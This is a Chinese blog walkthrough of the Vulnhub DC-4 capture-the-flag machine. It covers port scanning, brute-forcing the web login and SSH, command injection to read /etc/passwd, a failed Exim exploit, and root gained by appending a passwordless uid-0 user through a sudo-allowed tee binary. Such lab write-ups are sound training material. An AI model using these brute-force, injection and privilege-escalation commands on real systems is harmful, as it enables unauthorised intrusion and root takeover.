2. 技术
    3. Vulnhub-DC-4

    Vulnhub-DC-4

    技术2025-03-04  33

    扫描获取目标 IP 地址:192.168.67.135 nmap -sn 192.168.67.0/24

    扫描目标,获取系统信息和开放端口:80 && 22 nmap -A -p- 192.168.67.135 (初步猜想就是通过 web 获取到系统用户密码,再通过 ssh 登陆最后提权的思路)

    登陆 http://192.168.67.135 : 首先看下 wapplayzer,发现是 Nginx ,但暂时得不到详细版本,故先记录,以防备用 页面上写着:Admin Information Systems Login,说是以系统用户登录 再看看发现 POST 表单,试了下弱口令,不解,故拿出 Burpsuite 看看能否破解密码 浏览器设置好代理,抓请求然后burpsuite调至intruder, 拷贝一份字典到主目录下,方便 burpsuite 使用字典,在 intruder 下加载 payload ,start attack爆破即可 cp /usr/share/wordlists/nmap.lst /root/

    等待一段时间,得到密码为 happy [通过 length 不同即可看出密码],登陆进去看看 发现一个 command 链接,点进去挑选了个 List Files 可看到熟悉的东西:

    total 24 -rw-r–r-- 1 root root 1783 Apr 5 2019 command.php drwxr-xr-x 2 root root 4096 Mar 24 2019 css drwxr-xr-x 2 root root 4096 Mar 24 2019 images -rw-r–r-- 1 root root 506 Apr 6 2019 index.php -rw-r–r-- 1 root root 1473 Apr 7 2019 login.php -rw-r–r-- 1 root root 663 Mar 24 2019 logout.php

    `cat+/etc/passwd` 这不就是 linux 下经常使用的 ls 命令么...所以,抓下来看看能不能修修改改再发过去? --- send to repeater 通过修改我们可以 cat /ect/passwd 下有四个账户:root / sam / jim / charles 最初的猜想验证了,很可能就是 ssh 登陆进去... 到各个 /home/ 下看看有没有特别东西 `ls+la+/home/sam`:没啥东西 `ls+la+/home/jim`:发现只有一 backups目录和一 test.sh文件可查 `cat+test.sh`:没啥特别的,几行字 `ls+/home/jim/backups`:看看backups目录下都有啥,发现哟一个oldpassword文件,这...又是要爆破密码么...(果然) `cat+/home/jim/backups/old-passwords.bak`:将得到的密码复制一份到 kali的/root/oldpwd.txt 中 `vim oldpwd.txt`

    使用美杜莎爆破,得到密码 jibril04 medusa -M ssh -u jim -h 192.168.67.135 -P oldpwd.txt

    ssh登陆上去:ssh jim@192.168.67.135 打开刚才无权限打开的mbox,原来是封邮件,并且得到版本信息:Exim 4.89 所以search一波有没有可以直接提权的:searchsploit Exim Local Privilege

    发现确实有该版本的:Exim 4.87 - 4.91 - Local Privilege Escal | linux/local/46996.sh

    于是乎:scp 46996.sh jim@192.168.67.135:/home/jim/传过去 bash 46996.sh执行,报错… 漏洞利用不成功…

    到 /var/mail 目录下看看还有无有其它邮件:cd /var/www 发现一封:

    Hi Jim,

    I’m heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

    Password is: ^xHhA&hvim0y

    See ya, Charles

    哦吼,直接送上密码 既然是 boss 要给的,那是不是 charles 的权限要大点? ssh charles@192.168.67.135 ls

    木有发现什么东西,不过直觉上到这一步应该就是要提权了的。怎么提?这是个好问题那就看看自己有什么 sudo 权限:sudo -l

    开心的事情是:发现一个具有 sudo 权限的:/usr/bin/teehee,但是并不知道要怎么使用,查看一下帮助文档 /usr/bin/teehee --help

    原来通过该命令(前提是拥有绝对的权限)可以在任意文件后边添加内容那为什么不伪造另一个 root(到这里,我仿佛听到了邪恶的笑声…) echo "haha::0:0:root:/root:/bin/bash" | sudo /usr/bin/teehee -a /etc/passwd su haha cd /root ls cat flag.txt

    Congratulations!!!

    总结: 1.密码破解2.漏洞利用3.提权增添虚假root账号

    Processed: 0.014, SQL: 9